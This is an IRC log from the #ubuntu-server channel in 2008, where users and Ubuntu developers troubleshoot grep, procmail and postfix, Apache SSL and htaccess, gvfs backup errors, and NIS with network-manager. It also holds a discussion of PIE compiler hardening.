<Yahooadam> reburnt on my other cd burner and it passed the cd's check .....
<kgoetz> :D
<Yahooadam> install linux, install ssh
<Yahooadam> :p
<Yahooadam> sigh
<Yahooadam> why when i do sudo shutdown now on ubuntu server does it go
<Yahooadam> will now switch to single-users mode
<Yahooadam> root@myserver:~#
<asisak> Yahooadam: does it display some error messages?
<Yahooadam> i dont think so, gimmie 5 while i start it up again :p
<Yahooadam> doing sudo shutdown -r now works fine
<Yahooadam> no errors atall
<Yahooadam> a load of lines saying what its closing, followed by [Ok] 
<Yahooadam> then it says "will now switch to single-user mode"
<Yahooadam> and then i get a terminal prompt
<osmosis> hi
<osmosis> im playing with xen today
<nealmcb> Yahooadam: to halt, you probably want "shutdown -h now"  Consider "reboot" also.
<Yahooadam> ah maybe thats my problem :p
#ubuntu-server 2008-09-01
<jameswf-home> anyone know why I have to put my seed file in the initrd for it to work?
<chmac> How do I grep for a /? grep -E / -F and any combination of \/home/sites\\\/ doesn't seem to work.
<chmac> I'm trying to find the string "/home/sites/"
<ScottK> \/
<ScottK> \/home\/sites I think will work.
<hads> Just put it in quotes.
<chmac> ScottK: `grep -rHn "\/home\/sites\/" *` doesn't work as expected, it produces all sorts of spurious results which don't appear to contain home or site
<chmac> hads: You mean juse use `grep -rHn "/home/sites/" *` ? That also produces spurious results for me
<ScottK> What hads said should work.
<jameswf-home> whats wrong with ls
<hads> Yeah, `grep "/home/sites/" *` should be fine.
<chmac> Ok, so it does work, the error was elsewhere, sorry
<chmac> I was running `grep -rHn "/home/sites/" * | less`
<chmac> Then in less, /home didn't return any results, but the text was there, less just didn't find it properly
<jameswf-home> chmac: what are you tring to acomplish
<chmac> jameswf-home: I've moved a site from one server to another, the old path was /home/sites/ the new one is different
<chmac> I wanted to find all instances of /home/sites/ in the new htdir
<chmac> I was piping it to less because it was returning a line from an SQL cache file which was extremely long, so it was cluttering my screen
<chmac> I thought that grep wasn't working because when I tried searching in less, for "home", it wasn't found, so I thought grep was returning nonsense
<chmac> Turns out that less wasn't finding the text home, probably because it was too far along the line or something
<chmac> As in, the line was too long
<hads> If there's something you don't want in your results just pipe a grep -v on the end
<jameswf-home> maybe perl or sed would be better suited
<jameswf-home> grep ia a bit of a brut
<A|ysum> hello - how can I install libcurlftpfs on the old Ubuntu dapper ?
<A|ysum> i cannot compile it from source - too many errors
<hads> jameswf-home: grep is brut? grep is fantastic.
<jameswf-home> hads for globs and rough searches yes for specifics not so much
<hads> Then there's egrep :)
<jameswf-home> for i in `find /path/to/dir/` do sed -n '/\/home\/sites\//p'; done
<jameswf-home> doj
<jameswf-home> for i in `find /path/to/dir/` do sed -n '/\/home\/sites\//p' $i; done
<hads> Umm, ok.
<chmac> Thanks for all the grep help guys, got it sorted now and the site is running well :)
<chmac> Now to buy some furniture...
<A|ysum> hello can I pls get some help installed libcurl3-dev ? so many dependencies....
<A|ysum> how how do you pipe in ftp commands after ftp host command?
<jameswf-home> nc
<kraut> moin
<pschulz01> Howdy.. anyone sucessfully pushing 'search-domains' to clients using DHCP?
<osmosis> im stuck on this apache vhost issue
<soren> osmosis: "this apache vhost issue"?
<osmosis> soren: Im setting a ServerName for my VirtualHost, but its still using the default config rather then the new config I am specifying.
<osmosis> here is the config I am using, http://dpaste.com/75192/
<osmosis> the second virtual host is not working. I dont know why.
<soren> The first one doesn't list a servername?
<soren> Is that intentional?
<soren> And please elaborate on "is not working".
<pschulz01> Anyone use procmail ?
<soren> pschulz01: Yes.
<pschulz01> Are you using any rules on  the "Delivered-To:"?
<pschulz01> header?
<pschulz01> soren: I'm trying to use the procmail to keep a globol archive of incoming email...
<soren> pschulz01: No, no rules on Delivered-To
<pschulz01> soren: .. but .. it looks as though some email doesn't get a 'Delivered-To:' header (or the match doesn't work) which causes procmail to barf and bounce the message back through postfix.
<soren> Er... What?
<soren> If a procmail rule doesn't match, it just falls through and lands in the default mailbox.
<pschulz01> Ok.. (email)->Postfix->Procmail
<pschulz01> Procmail fails with "procmail: Exceeded LINEBUF".. which is a a little stupid, as I've made the LINEBUF huge (32k).
<soren> How have you configured postfix to pass things to procmail?
<pschulz01> .. and the log indicates that procmail: No match on "^Delivered-To: \/[^@]+"
<soren> What do your delivered-to headers look like?
<pschulz01> soren: Default ubuntu-server install (I believe).. but..  (looking)
<pschulz01> soren: Ahha! in main.cf
<pschulz01> main.cf:mailbox_command = /usr/bin/procmail
<AnRkey> i have an Ubuntu 7.10 postfix and procmail box with dovecot for imapd and pop3, what files do i need to move to my new 8.04 server to migrate this setup?
<AnRkey> bbl
<soren> pschulz: Ok. Yeah, that looks just right. Do you have an example e-mail that fails like that? (with the "Exceeded LINEBUF" thing)
<broonie> Is there any chance someone could have a look at the NIS package?
<Bambi_BOFH> broonie, what sort of look?
<broonie> Bambi_BOFH: The major thing would be to disable Network Manager support by default (since it causes no end of bug reports)
<broonie> Bambi_BOFH: But there's also some long-standing issues with the ordering of NIS in the init process which appear to be getting no love at all.
<Bambi_BOFH> not sure where to follow that up. -dev, i guess, but you could try -motu or -bugs
<broonie> It's in main so motu isn't appropriate.
<broonie> -devel suggested I try here for someone who might want to look at it.
<Bambi_BOFH> hm.
 * broonie is the Debian manintainer; I could provide patches but my experience hasn't been all that positive.
<Bambi_BOFH> nod
 * Bambi_BOFH wont be the one to step forward, not a lot of time atm :(
 * NCommander is away: This creature sleeps beyond the reaches of time itself
<ghaleb__> hello, how can I use ls command to show subdirectories
<thefish> ghaleb__: -R is recursive, it will show all subdirs and contents recursively
<ghaleb__> thefish: thank you, I want it to tape data using cpio
<thefish> ghaleb__: you want to back up just the listing?
<ghaleb__> no
<ghaleb__> ls | cpio -oVc > /dev/rmt/0
<ghaleb__> ls -R would backup subdirectories as well
<KoS> hi all
<KoS> i have one problem with ubuntu server installation
<KoS> how can i get root pwd ?
<Bambi_BOFH> !root
<ubottu> Do not try to guess the root password, that is impossible. Instead, realise the truth... there is no root password. Then you will see that it is 'sudo' that grants you access and not the root password. Look at https://help.ubuntu.com/community/RootSudo
<KoS> when I installing it dont ask to type root pwd.
<Bambi_BOFH> no, it wouldnt have
<Bambi_BOFH> look at the wiki page meantioned
<KoS> ok thanks
<confidential> I think something went wrong during the install when it was configuring apt, where can I find out what sources.list is supposed to contain in ubuntu-server 7.10 ?
 * delcoyote hi
<soren> broonie: I remember some talk between you and someone else a while back... Was it Michael Vogt perhaps?
<broonie> Not me.
<broonie> I did ask about this on -devel a couple of days ago. I also spoke via msg with someone who was patching a FTBFS but they didn't seem terribly confident in doing anything substantial.
<broonie> Oh, I probably spoke to mvo about n-m causing constant problems.
<soren> broonie: Yeah, that sounds about right.
<soren> broonie: What are the nature of your problems, exactly? In Ubuntu Server we don't have network-manager by default.
<broonie> As far as network manager goes it appears that a reasonable number of people enable NIS on their clients then have n-m break it.
<broonie> So it'd be nice if someone would disable n-m support by default for release at least.
<broonie> That'd stop the overwhelming majority of bug reports about NIS in Ubuntu.
<broonie> I don't think it's desparately related to server itself either but -devel bounced me here for someone who might care (which I suppose makes some sense since servers tend to have clients).
<ivoks> woho!
<ivoks> dell reseler in croatia now offers ubuntu :)
<soren> broonie: Disable n-m- for release? I don't think I follow?
<soren> broonie: You want us to have the development releases have n-m enabled, but then disable it at release time (kind of like apport)?
<broonie> soren: Or just disable it all the time, I don't care either way.
<broonie> (the n-m integration in NIS, this is)
<soren> broonie: I'm not sure what n-m integration NIS does?
<broonie> ypbind can use n-m to detect when there is a worknig network connection.
<soren> I've not used NIS in a non-server environment, so no network-manager.
<soren> broonie: Ok. Sounds reasonable enough?
<broonie> Unfortunately on some systems n-m constantly lies about this.
<soren> ivoks: Neat! Maybe Denmark will follow soon!
<ivoks> soren: heh, laptop for 300euros :)
<ivoks> otherwise they are starting at 500â¬ here
<soren> broonie: Ok.. I realise this is a problem for NIS, but it doesn't sound like anything you can solve from the NIS side.
<soren> broonie: Let's try it this way: What do you propose as an alternative?
<broonie> ypbind can be told to ignore n-m by default
<broonie> Which sidesteps the issue.
<soren> But in case n-m isn't lying and there's actually no network available, I don't suppose that's handled particularly gracefully?
<broonie> This is what Debian shipped for etch and will ship for lenny.
<broonie> It handles it as gracefully as it ever did which isn't too bad - there's a long timeout at startup but other than that it works.
<soren> broonie: I suppose there's a bug open about this?
<broonie> I strongly expect a very small proprotion of users actually make use of NIS in configurations where this is a likely occurrence and their system is still usable without it.
<broonie> There's ones like #224828
<soren> bug 224828
<uvirtbot> Launchpad bug 224828 in nis "NIS demon fails during startup if the roaming mode is turned off" [Undecided,New] https://launchpad.net/bugs/224828
<soren> broonie: From the looks of that bug, it seems that nis only checks for network during startup. Is that accurate?
<soren> broonie: I would have expected it to spring to life when the network connection came around.
<broonie> soren: no, that's not the case at all.
<soren> Well, not so much "checks for network", but "checks whether HAL thinks we have network".
<soren> broonie: Ok.
<broonie> It checks whenever n-m claims the status changes.
<soren> Ok.
 * soren rereads
<soren> broonie: Ok, so the problem is that n-m says "connected" too soon, so nis checks and finds that there's actually no network, and since n-m's state never changes, nis doesn't recheck?
<soren> If that's not it either, can you please explain it again?
<broonie> When n-m goes to connected state it may not be connected.
<broonie> The n-m status may change again but since it would be leaving the connected state nis will beleive that the network has been disconnected
<broonie> So when connected is reported it is too soon and since it only generates events on status changes there's no kick to re-check.
<broonie> NIS should be coping better with this but disabling the network manager integration is a simple, non-invasive workaround.
<soren> broonie: Have you talked to network-manager people about this?
<broonie> soren: They don't appear to care.
<soren> broonie: No response at all?
<broonie> Basically, yes.
<broonie> AFAICT NIS is only marginally supported in Ubuntu anyway.
<soren> broonie: Have you checked n-m 0.7's behaviour?
<soren> broonie: I just checked, and nm-tool doesn't seem to say "connected" until I'm actually connected.
<broonie> It's always worked on a lot of systems.
<soren> ...
<broonie> Appears to be related to the NIC driver.
<broonie> Or possibly the local network.
<soren> I wonder... Why does nis go and recheck whether the network is there, if n-m says it's there?
<broonie> It doesn't.
<broonie> What it does is try to use the IP address of the interface which falls over because none has been assigned.
<soren> Ok, is there a bug that actually has all this information in it, so that I don't have to sit here and guess all the right questions to ask?
<broonie> Probably not a single one.
<broonie> They mostly get assigned over to n-m and then triaged/closed away.
<soren> Example?
<soren> Also, have you checked it with n-m 0.7?
<broonie> Sorry, I don't archive the relevant info.
<broonie> No, I've never been able to reproduce this on my own systems.
<soren> You said something in the beginning about patches..
<broonie> Someone (not me) patched a FTBFS in nis in ubuntu recently.
<broonie> They spoke to me about it for some reason.
<soren> 10:02:43  * broonie is the Debian manintainer; I could provide patches but my experience hasn't been all that positive.
<broonie> Oh, that. Essentially that's a case of figuring out how to put a patch into lp and get it applied; most of the problems are process/lp usage ones.
<soren> So you have patches? Or not?
<broonie> It's a one line patch, I can generate it trivally when I get home.
<broonie> Or now, for that matter.
<soren> does it just pass --no-dbus to nis?
<soren> Or does it fix network-manager?
<broonie> The former.
<soren> It's really not very appealing. Asking network-manager about the status of the network seems like a reasonable thing to do.
<broonie> I agree; ideally there would be a better fix.
<soren> I would very much like to know if the problem persists in Intrepid (i.e. with n-m 0.7)
<broonie> soren: AFAICT the best thing for that is to wait for release and see if anyone complains.
<broonie> nis users tend not to be early adopters :/
<jmedina> I dont know any admin/friend who uses nis, instead all they use ldap/nss
<siretart> broonie: perhaps there is some way to disable nm integration at runtime rather than compile time?
<broonie> siretart: That's what I'm suggesting people enable.
<broonie> siretart: There's a default configuration file in the package, I'm suggesting changing that default to disable the n-m integration.
<frith> an ubuntu directory server is a great idea
<acemo> how can i make a sort of symlink to /home/torrentflux/acemo in a proftpd folder so that the symlinked folder is actually accessable through ftp?
<siretart> broonie: that sounds reasonable to me. do you happen to know if there is already a bug about this that I could reference in the changelog?
<pschulz01> Morning..
<pschulz01> soren: ping?
<pschulz01> I'm still having procmail issues, which I'd like to get to the bottom of..
<pschulz01> but.. I would rather write up the problem I am having somewhere as a 'blueprint' or 'answer' as I'm sure that there is a better way of doing what I am trying to do.
#ubuntu-server 2008-09-02
<cotton> hello, is there a posibility to install X and pekwm on ubuntu server? is it too complicated? thanks.
<kgoetz> yes its posible, and you should probably ask #ubuntu how
<soren> pschulz01: What are you trying to do?
<pschulz01> soren: Putting together a question now :-)
<pschulz01> https://answers.launchpad.net/ubuntu/+question/43886
<pschulz01> soren: Does that make sense?
<soren> pschulz01: Yes.
<soren> pschulz01: Did you take a look at the always_bcc option?
<soren> pschulz01: Alternatively, recipient_bcc_maps might be of use.
<pschulz01> Oooo.... sound's useful :-)
<pschulz01> Should be more robust if I can move it to 'postfix'.
<soren> pschulz01: You could probably abuse postfix-pcre to do the mapping.
<pschulz01> soren: yeah. The 'really' painful thing about this is that I need to keep 'procmail' as the local delivery agent, as a couple of users are using it.
<soren> pschulz01: Is that a problem?
<soren> pschulz01: I'm a bit sleepy, so please bear with me :)
<pschulz01> soren: Um.. just means that I can't just disable procmail delivery and let postfix do it.. 'cause my users want their procmail rules to work.
<pschulz01> soren: The main problem with the second option, is that procmail barfs on some emails.. and I haven't been able to work out why.
<pschulz01> soren: I'm goin gto just do som reading for a while... no huge rush.
<soren> I've never seen procmail fail like that, and I've filtered quite a few e-mail with procmail in my time :)
<soren> Just for my one of my own e-mail accounts I've filtered about a million e-mails since January 2006, and that has never happened to me.
<pschulz01> soren: That's what's confusing me as well..
<pschulz01> soren: I was inially seeing things like..
<pschulz01>  Command
<pschulz01> died with signal 11: "/usr/bin/procmail". Command output: procmail:
<pschulz01> Exceeded LINEBUF
<pschulz01> .. but I've up the LINEBUF variable, and it still happens.
<soren> Do you have an e-mail that reliably reproduces it?
<pschulz01> soren: No.. that's the next step, but it's a little tricky.. cause they get bounced.
<soren> pschulz01: Set soft_bounce = yes.
<pschulz01> soren: Looks like I can get users to make use of their '.forward' file to run their procmail scripts.. rather than running a global one..
<soren> pschulz01: Yeah, that's the way it was done back in the ol' days. :)
<pschulz01> soren: .. takes me back.
<soren> Yeah, me too.
<soren> ...to the pain and suffering of being an HP-UX admin.
 * soren is never going back there
<nxvl> soren: why?
<soren> Why what? Why I'm not going back to HP-UX?
<pschulz01> nxvl: belive me... we live in a much better time.
<nxvl> soren: oh! i didn't know what you were taking about, but found funny to ask
<soren> :)
<nxvl> i'm kind of bored in a software engineering class
<soren> The *only* positive thing I have to say about HP-UX is that it's where LVM came from.
<soren> Gerh, I should really go to bed.
<pschulz01> soren: Ever hav to deal with AIX?
<pschulz01> soren: go go go
<nxvl> pschulz01: i have use solaris on a sparc machine
<soren> pschulz01: Never had the "pleasure", no.
<pschulz01> soren: :-)
 * soren wanders off for bed.
<soren> Take care, folks.
<nxvl> soren: sleep tight!
<nxvl> soren: see you at "the office"
<nxvl> :P
<D3RGPS31> Where do I place library files for LAMP webserver? (eg, libgd.so.2.0.0)
<kgoetz> why do you want to install the file by hand?
<D3RGPS31> I just switched from xampp to lamp, I just assume that's how it's done
 * kgoetz googles xampp
<kgoetz> D3RGPS31: i suggest you install one of the packages listed on here: http://packages.ubuntu.com/search?searchon=contents&keywords=libgd.so.2.0.0&mode=exactfilename&suite=hardy&arch=any
<kgoetz> assuming you run 8.04 of course
<D3RGPS31> If that package was installed before switching to lamp, should I reinstall it?
<kgoetz> if you installed it from the ubuntu repositories you shouldnt have to, no
<D3RGPS31> Would install by tasksel be the same?
<kgoetz> yes, tasksel should use the ubuntu repos
<D3RGPS31> Then they're both installed through the repository
<D3RGPS31> So, what can I do?
<lukehasnoname> How's UFW integration coming? Is it completed?
<Derander> I'm using postfix/dovecot.  I'm authenticating off of a fake users file in /etc/dovecot/users.  Users are like 'name@domain.tld'.  Is there a way to alias a user between two domains?  I'd like name1@domain.com to deliver to name1@domain2.com
<D3RGPS31> Can I use htaccess password authentication with SSL?
<kgoetz> yes
<D3RGPS31> Does it require anything different from the norm?
<kgoetz> for what value of 'norm'?
<kgoetz> you'll need ssl certs at least
<D3RGPS31> have SSL setup, but my htacces doesn't work now (after I set SSL for a certain web folder)
<kgoetz> what does "doesnt work" mean exactly?
<Derander> Alright, I'm confused.  I'm running a mailserver with postfix/dovecot and ssl.  I have an ssl cert that works for domain1, for some reason it also works for domain2 but it does not work for domain3
<D3RGPS31> I'm not prompted to type in a name//password
<D3RGPS31> but I was when it didn't have SSL set on it
<kgoetz> ... are we talking htaccess or email here?
<D3RGPS31> htaccess
<kgoetz> how did the email come into it?
<D3RGPS31> email?
<Derander> kgoetz I think you're confusing me with him.
<D3RGPS31> Derander is talking about email >.>
<D3RGPS31> xD
<kgoetz> Derander: so i am :)
<kgoetz> :x
<D3RGPS31> sorry for not going into decent detail, been drinking coffee for once, kinda clouding my thoughts
 * kgoetz is currently fighting apache, so not in the greatest mood himself ;)
<D3RGPS31> Let's say I used htaccess for a http virtualhost on port 70, then i switched that to https, would the htaccess require something different >.>
<kgoetz> D3RGPS31: 'switched to https' how?
<kgoetz> using a virtualhost to redirect?
<D3RGPS31> I don't know if redirect is the right word
<D3RGPS31> eg. port 80 with just http set to /var/80, port 70 with SSL to port /var/80?
 * kgoetz suspects that didnt come out right ...?
<D3RGPS31> port 70 set to /var/80? *
<kgoetz> D3RGPS31: pastebin your vhost configuration. i cant work out what your doing
<D3RGPS31> http://pastebin.com/d5430cc9b for non-SSL; http://pastebin.com/d7d74936a for SSL; I use two seperate vhost files
<kgoetz> i dont see a redirect taking place *g*
<D3RGPS31> I didn't understand what was meant by redirect
<kgoetz> D3RGPS31: http://www.maincontent.net/examplehttpd.txt look at this for an example
<D3RGPS31> so port 80 and port 443 point to the same directory?
<kgoetz> 80 doesnt point to a directory at all
<kgoetz> it just points to port 443
<D3RGPS31> ah!
<D3RGPS31> but, what's stopping an authentication prompt from popping up under my SSL connection
<kgoetz> i didnt see a prompt for it
<D3RGPS31> it's in the htaccess file, that's in my /var/70 directory
<kgoetz> then its probably an error in your htaccess file. have you checked your logs?
<D3RGPS31> checking!
 * delcoyote hi
<moldy> hi
<kraut> moin
<moldy> can i avoid that .gvfs stuff somehow? when root tries to read it, he gets permissions errors. that crap is making my cronjobs fail...
<D3RGPS31> I see nothing about htaccess in the logs, it works without SSL but not with SSL
<broonie> siretart: Not specifically; bug 252499 is probably the nearest
<uvirtbot`> Launchpad bug 252499 in nis "When nis server is not reachable during startup, system gets very slow and HAL fails to initialise" [Undecided,New] https://launchpad.net/bugs/252499
<soren> moldy_: You have cronjobs failing because root can't read .gvfs? What exactly are these cronjobs trying to do?
<jpds> How can I find out what my gateway ip is from the terminal?
<DiesIrae> jpds: /sbin/ip route show 0/0
<jpds> DiesIrae: Thanks!
<DiesIrae> you're welcome
<moldy_> soren: different stuff
<moldy_> soren: doing backups (rsnapshot), and other maintenance stuff on users' homedirs
<moldy_> i know how to work around it, but i would like a solution instead of a workaround
<moldy_> what is the rationale of root not being able to read stuff?
<soren> That's the way fuse works.
<moldy_> hmm, that sucks.
<soren> moldy_: https://bugs.edge.launchpad.net/ubuntu/+source/rsnapshot/+bug/247777
<uvirtbot`> Launchpad bug 247777 in rsnapshot "the .gvfs directory in a user's home directory causes rsnapshot to take an incorrect backup (dup-of: 225361)" [Undecided,Invalid]
<uvirtbot`> Launchpad bug 225361 in gvfs "Superuser cannot access ~/.gvfs folder when mounted " [Medium,Triaged]
<soren> uvirtbot`: nick uvirtbot
<moldy_> what does "triaged" mean?
<moldy_> anyway, i guess i have to adjust my cronjobs and just wait for a fix...
<hads> Triaged as in; looked at, noticed and prioritised.
<moldy_> ok, thanks
<soren> moldy_: What is your workaround? "--exclude .gvfs"?
<soren> moldy_: -x, perhaps?
<moldy_> soren: yep
<moldy_> soren: for rsync/rsnapshot, i use exclude
<moldy_> other scripts do similiar stuff, or they unmount the thing
<moldy_> i have one script that deletes and recreates certain home directories every hour
<soren> Is it really your intention to backup stuff under .gvfs?
<moldy_> no
<moldy_> for backups, i exclude it
<soren> Then what would be "a fix" to you?
<moldy_> the proper fix IMHO is to make it accessible by root
<soren> Err...
<soren> You *just* said you don't want to back it up.
<moldy_> so?
<soren> ...so you want to --exclude it anyway.
<moldy_> yes
<moldy_> but it is brain-damaged that every backup routine on the planet should be adjusted to gvfs
<soren> think of it this way:
<moldy_> the point is not wether it is backed up or not, the point is that it makes the backup routines appear to *fail*
<soren> If gvfs (actually fuse) didn't act this way, you'd be backing up *anything* *any* user might have mounted using gvfs.
<moldy_> that's my decision to make, not gvfs's
<moldy_> and backups are not the only concern here
<moldy_> if some maintenance script does e.g. a find on a user's home dir, it will get messed up because find will return an error because it cannot read gvfs
<moldy_> people assume that root is able to read everything in users' home dirs
<moldy_> if your system uses gvfs, you now have to special-case it everywhere
<soren> I know.
<moldy_> the alternative is to ignore *all* such errors, which is also often undesirable
<soren> ...I firmly believe that that is the case anyway.
<moldy_> $home is completely the wrong place to put such stuff then, imo
<soren> It belongs to the use?
<soren> user?
<moldy_> so what
<moldy_> put it in /tmp
<soren> That also sounds a bit counterintuitive.
<moldy_> i think it is alot less counterintuitive than root not being able to read stuff in /home :)
<soren> moldy_: Perhaps. In any case, I suggest you talk to the desktop guys. gvfs is their terriroty.
<soren> territory, I mean.
<moldy_> well, the bug is already reported, i guess i should just wait
<nxvl> good morning
<soren> Hey, nxvl.
<nxvl> soren: hi! how are you?
<soren> nxvl: Pretty good.  A bit sleepy, though. I'm trying to cut down on coffee.
<nxvl> soren: yeah i will go for some coffeine in a bit
<nxvl> :D
<zul> morning
<Dedi>  LARTC - want to limit all upload from a specific ip to 20kb/s. anyone that knows it and want to save me alot of time to read into this topic? :D
<andrethehook> While following the perfect setup guide for 8.04LTS (http://howtoforge.org/perfect-server-ubuntu8.04-lts-p4) i get an error while installing mysql-server, you can see the output here http://pastebin.ubuntu.com/42682/ something with the initscripts.. i can not stop bind9 server either, but have to kill it :/ anyone have some tips for me? :)
<Dedi> andrethehook: i had to edit the mysql config and comment out a line.. just dont know which it was
<Dedi> something starting with p
<andrethehook> Dedi: thanks, i'll look into it :)
<andrethehook> Dedi: same problem btw?
<Dedi> andrethehook: hm i had something like that while upgrading. but that was with intrepid
<nxvl> soren: btw, did you finally manage to include the python rewrite into intrepid?
<nxvl> managed*
<soren> nxvl: The source package was accepted, but the binary is still stuck in the NEW queue.
<soren> nxvl: But in short: Yes, I did :)
<nxvl> \o/
<soren> But please keep this to yourself. Otherwise I won't have anything useful to say at the meeting today. :)
<nxvl> heh
<nxvl> :D
<nxvl> ok
<ScottK> lamont: Having fun with the new postfix update yet?
<lamont> ScottK: ah cool, it is out.
<lamont> I still have a little bit of a dance to do - I just got the final version yesterday.
<andrethehook> While following the perfect setup guide for 8.04LTS (http://howtoforge.org/perfect-server-ubuntu8.04-lts-p4) i get an error while installing mysql-server, you can see the output here http://pastebin.ubuntu.com/42682/ something with the initscripts.. i can not stop bind9 server either, but have to kill it :/ anyone have some tips for me? :) may it be a error in the initscript?
<andrethehook> or maybe a bug?
<lamont> ScottK: now I just need to decide if intrepid cares enough to have an upload before I sync from debian...
<ScottK> I'd think not.
<ScottK> lamont: My 'fun' thing for the day was finding out at midnight lastnight that all of KDE4 needed to reuploaded and build before alpha5 and Riddell is on vacation.
<ScottK> There aren't many Kubuntu core-dev, so I was up a bit late.
<ScottK> I'm going to take a nap.
<byte_slave> Hi everyone!
<byte_slave> i don't know what i did, but ubuntu 8.04 simply doesn't accept any login and has something new in the login screen such as "Ubuntu intrepid (development branch) <mymachinename> tty1"
<lamont> hrm.. I guess if I request a sync, I should at least upload the package.. . :-)
<byte_slave> the last thing i did was playing with samba + win active directory integration
<lamont> byte_slave: you're not running 8.04 if it says 'intrepid'
<byte_slave> the base installation was 8.04 is now is Intrepoid ( the new ubuntu release right?) it was a process that made some core updates without warn me
<uvirtbot> New bug: #264004 in postfix (main) "Please sync postfix 2.5.4-1 (main) from Debian unstable (main)." [Wishlist,Confirmed] https://launchpad.net/bugs/264004
<lamont> you upgraded from a stable long-term-support to an unsupported development release...  of course things break :-(
<lamont> OTOH, it should work.. so bugs should be filed when you figure out why they broke
<byte_slave> lamont, ok. you think some process inside must be programmed to go to web and update without ask?
<byte_slave> because i didn't nothing, neither a single apt-get upgrade-distro ou whatever
<lamont> nf
<lamont> no ideas
<byte_slave> dammit, what happened why my happy box?
<byte_slave> well, i'll try so google for some more info.. and see if i can do a
<byte_slave> an easy downgrade
<zul> meeting in 10 minutes?
<nijaba> zul: yes indeed
<soren> nijaba: Note: I'm moving the vmbuilder code.
<nijaba> soren: np, thanks for letting me know
<soren> nijaba: There. Moved from https://code.edge.launchpad.net/~ubuntu-virt/ubuntu-jeos/python-rewrite to https://code.edge.launchpad.net/~ubuntu-virt/vmbuilder/trunk
<_ruben> grr .. perl on this box is still "confused" .. http://paste.ubuntu.com/42739/
<uvirtbot> New bug: #263178 in postfix (main) "package postfix 2.5.1-2ubuntu1.1 failed to install/upgrade: subprocess post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/263178
<lamont> meh
<jameswf-home> okay holliday is over anyone alive?
<didrocks> jdstrand: around?
<jdstrand> didrocks: yep, hi
<didrocks> Hi :)
<didrocks> 1/ thanks for the hug :)
<didrocks> 2/ I am sorry, I just had the time to look at the case insensitive trick in ufw
<didrocks> it was quite easy I think, and I made yesterday a branch from your trunk and normally achieve it
<didrocks> (bzr is very cool, btw)
<jdstrand> didrocks: I only looked at the bug briefly a few minutes ago
<jdstrand> didrocks: thanks for the patch :) did you run 'run_tests.sh' after the patch?
<didrocks> hum, no, what is it? :)
<jdstrand> (or build the package-- it's run there)
<didrocks> oh, I just rerun it dynamically
<didrocks> Indeed, I have made some symlink to my branch in intrepid
<didrocks> python rocks for that :)
<jdstrand> it's a collection of tests to make sure everything is still working ok
<didrocks> (I just simlinked application.py and frontend.py)
<didrocks> Ok, I give it a try now
<didrocks> does ufw has to be setup or can I just run it in my branch?
<jdstrand> didrocks: just './run_tests.sh -s' from the top of your branch
<didrocks> ok, there is some fails. I have to compare it to your trink :)
<didrocks> (on --dry-run, specifically)
<didrocks> trink/trunk
<didrocks> jdstrand: so, I corrected the errors. I am just trying to setup my VM up again (seems to be broken) to perform some manual tests
 * jdstrand nods
<mathiaz> kees: do you have a  wiki page or blog post where you've explained/tracked your PIE work ?
<didrocks> jdstrand: I finally got my vm work unactivating acpi. So, I made some tests and it is ok. I push a new revision in my branch
<jdstrand> didrocks: thanks
<jdstrand> :)
<mathiaz> kees: I'm writing up a post about what has been done in the archive in august and some of them are related to your work on PIE
<kees> mathiaz: well... it's a bit scattered.
<didrocks> jdstrand: I will have a look at your test shell to add non regression for case insensitive, if possible :)
<mathiaz> kees: did you try to rebuild all of the archive with PIE enabled ?
<kees> mathiaz: I did, yeah.  that was back in hardy though.
<mathiaz> kees: ok - so rather than enabling pie in the default build, it has been decided at UDS at PIE would be enabled on a per package basis
<mathiaz> kees: ?
<kees> mathiaz: PIE is mentioned here... http://www.outflux.net/blog/archives/2008/01/15/full-aslr-in-hardy/ http://wiki.debian.org/Hardening
<kees> mathiaz: that's correct
<mathiaz> kees: and in order to enable PIE, a dependency on hardening-wrapper is added to the package
<mathiaz> kees: where as all the other hardening things have been enabled directly in the compiler
<kees> mathiaz: well, there is what I'd call "native" PIE (see openssh and samba), and "wrapper" PIE.  In the case of the wrapper, two things are needed: the hardening-wrapper build-dep and "export DEB_BUILD_HARDENING=1" in the debian/rules file
<kees> mathiaz: right, which are documented here: https://wiki.ubuntu.com/CompilerFlags
<mathiaz> kees: and native PIE is when the upstream source code directly support PIE ?
<kees> mathiaz: well, either upstream directly (samba's "--enable-pie") or via the packaging which passes the options in to the native build process (openssh)
<mathiaz> kees: ok - thanks for your input
<mathiaz> kees: that should be enough for the blog post
<kees> mathiaz: sure!  sorry I haven't kept the PIE details in a single place.  :P
<mathiaz> kees: would you consider that PIE is the last point on your hardening list ?
<fReAkY[t]> hi all. i have set up an apache2 ssl cert using this guide: https://help.ubuntu.com/community/forum/server/apache2/SSL but the newly created cert is only valid for 1 month. how can i change that to be valid for 1 year?
<kees> mathiaz: there is one more, which is pretty minor, but is similar to PIE in that I'd like to do it on a per-package basis: "-Wl,-z,now"
<kees> mathiaz: but I'd like to wait until intrepid+1 for that, since it depends on the intrepid -Wl,-z,relro change
<leonel> hello ..  will  tomcat6  be moved  to MAIN ??
<mathiaz> leonel: it's the plan
<leonel> mathiaz:  anything I can help ??
<mathiaz> leonel: MIR have been written and the goal is to add a task during the installation
<leonel> mathiaz:  ok ..
<mathiaz> leonel: from a development POV not really. However testing is always very welcomed.
<mathiaz> kees: the vast majority of package would require the use of the hardening-wrapper to enable PIE rather than native support ?
<kees> mathiaz: it is by far the simplest approach -- there are two complexities in doing PIE via packaging changes: a) detecting the arch and disabling PIE on arch that don't support it, b) successfully plumbing the CFLAG and final link flags down into the upstream build system.
<kees> mathiaz: very few upstreams have knowledge of PIE already (frankly, prior to last week, I would have said "none", but samba actually does have it)
<NCommander> kees, the problem is that PIE code in GCC historically has had issues
<NCommander> kees, especially late 2.x series and 3.x on PowerPC and m68k, -pie would sometimes generate non-working code
<NCommander> kees, and on x86, the performance hit is large enough that unless you have a very fast machine, it hurts :-/
<kees> NCommander:   ifeq (,$(findstring :$(DEB_HOST_ARCH_CPU):,:hppa:m68k:arm:))
<NCommander> kees, what's that from, samba?
<kees> yawp.  totally disabled on m68k, hppa, arm.
<kees> NCommander: that's from hardening-wrapper
<NCommander> We finally got pie fixed in the 4.x series
<NCommander> But PIE is slow slow
<NCommander> (go try gentoo with it on and off, its a notable difference on x86)
<kees> NCommander: PIE is only slow with arch that have very few general registers (ia32)
<NCommander> Right
<NCommander> x86
<kees> NCommander: there was virtually no measurable change on x86_64.
<NCommander> I know
<NCommander> I said it was just x86
<kees> yeah, totally agreed.
<NCommander> I was just noting GCC has a bad track record with PIE
<kees> GDB's is worse.  ;)
<kees> No better way to find bugs than to use a buggy feature.  ;)
